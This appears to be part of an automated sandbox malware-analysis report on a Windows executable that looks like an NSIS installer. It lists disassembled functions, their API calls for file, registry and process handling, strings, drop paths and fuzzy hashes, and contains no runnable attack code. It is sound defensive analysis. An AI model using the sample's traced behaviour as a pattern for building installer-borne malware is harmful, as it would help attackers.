GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3lH2EWD4wU.exe,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00402DDC

Strings

C:\Users\user\Desktop\3lH2EWD4wU.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
soft, xrefs: 00402E51
Inst, xrefs: 00402E48
Error launching installer, xrefs: 00402DB3
Null, xrefs: 00402E5A
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
"C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 00402D63
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3lH2EWD4wU.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-2608562989
Opcode ID: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
Opcode Fuzzy Hash: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

Function 00405FC2 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 004060ED
GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,004050FF,Completed,00000000), ref: 00406100
SHGetSpecialFolderLocation.SHELL32(004050FF,762323A0,?,Completed,00000000,004050FF,Completed,00000000), ref: 0040613C
SHGetPathFromIDListA.SHELL32(762323A0,: Completed), ref: 0040614A
CoTaskMemFree.OLE32(762323A0), ref: 00406156
lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
lstrlenA.KERNEL32(: Completed,?,Completed,00000000,004050FF,Completed,00000000,00000000,00420FD4,762323A0), ref: 004061CC

Strings

: Completed, xrefs: 00405FEC, 004060B9, 004060BA, 004060BB, 004060D7, 004060EC, 004060FF, 0040611B, 00406146, 00406179, 0040617F, 00406197, 004061AA, 004061C5, 004061CB, 004061D3, 004061FD
Completed, xrefs: 00405FE7
Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BC
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406174
Triu,fe$, xrefs: 004061A4

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$Triu,fe$$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1685223899
Opcode ID: 3c1c995c5f9bde827c4174b96e9e8874e10e0fc44bc72d96516fe9b754b6549c
Instruction ID: 277d3937a9213029abeea5e1082be0a56f2569e83deff567e7d71b2b9830288d
Opcode Fuzzy Hash: 3c1c995c5f9bde827c4174b96e9e8874e10e0fc44bc72d96516fe9b754b6549c
Instruction Fuzzy Hash: 2B61E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,renegaternes,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,renegaternes,renegaternes,00000000,00000000,renegaternes,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004050C7: lstrlenA.KERNEL32(Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,762323A0), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(Completed,Completed), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Strings

Urbacity\Uninstall\deltransformations, xrefs: 00401826, 00401842
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd, xrefs: 00401786
renegaternes, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
Triu,fe$, xrefs: 0040180D, 00401819, 00401831

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd$Triu,fe$$Urbacity\Uninstall\deltransformations$renegaternes
API String ID: 1941528284-2569544012
Opcode ID: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
Opcode Fuzzy Hash: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

Function 004050C7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,762323A0), ref: 00405123
SetWindowTextA.USER32(Completed,Completed), ref: 00405135
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Strings

Completed, xrefs: 004050E7, 004050F9, 004050FF, 00405122, 0040512E

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
Opcode Fuzzy Hash: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

Function 00402F9C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403003
GetTickCount.KERNEL32 ref: 004030AA
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030D3
wsprintfA.USER32 ref: 004030E3

Strings

... %d%%, xrefs: 004030DD
(TA, xrefs: 0040315D
(TA, xrefs: 00403059

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: (TA$(TA$... %d%%
API String ID: 551687249-2950751476
Opcode ID: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
Opcode Fuzzy Hash: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

Function 004062CA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
wsprintfA.USER32 ref: 0040631A
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E

Strings

UXTHEME, xrefs: 004062D3
\, xrefs: 004062F2
%s%s.dll, xrefs: 00406314

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

Function 00405B68 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B7C
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96

Strings

nsa, xrefs: 00405B73
"C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 00405B68
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1906898991
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040558D: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd
API String ID: 1892508949-1999411507
Opcode ID: 24723478155056ce44161477fb326503c5b700edecc591072070bbe499807ef2
Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
Opcode Fuzzy Hash: 24723478155056ce44161477fb326503c5b700edecc591072070bbe499807ef2
Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F

Function 0040563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
CloseHandle.KERNEL32(?), ref: 00405675

Strings

Error launching installer, xrefs: 00405652

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C

Function 004023D6 Relevance: 4.6, APIs: 3, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(0040AC18,00000023,00000011,00000002), ref: 00402421
RegSetValueExA.KERNELBASE(?,?,?,?,0040AC18,00000000,00000011,00000002), ref: 0040245E
RegCloseKey.ADVAPI32(?,?,?,0040AC18,00000000,00000011,00000002), ref: 00402542

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 4f16d4bf7909d29b697dbe6c79f78a3acee279fd1b41d6286fcb43dda6c46c2e
Instruction ID: 52a398de0ffa64e75c678b0ba9290c89a7bc7a6ef294ba5bc2d5d90b06733894
Opcode Fuzzy Hash: 4f16d4bf7909d29b697dbe6c79f78a3acee279fd1b41d6286fcb43dda6c46c2e
Instruction Fuzzy Hash: C8118171E00215BEEB10EFA59E49AAEBA74EB54318F20843BF504F71D1CAB94D419B68

Function 004024E5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040252A
RegCloseKey.ADVAPI32(?,?,?,0040AC18,00000000,00000011,00000002), ref: 00402542

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: b4c15210f41ecf953e26901ff4092447194416178c46922be39451fc39009806
Instruction ID: d6682fe5282a570b067a4eb437d7391ea775acd6fa74fe75c745453303d77b76
Opcode Fuzzy Hash: b4c15210f41ecf953e26901ff4092447194416178c46922be39451fc39009806
Instruction Fuzzy Hash: FF01B1B1A00205BFEB119FA59E9CEBF7A7CDF40348F10003EF005A61C0DAB84A459729

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

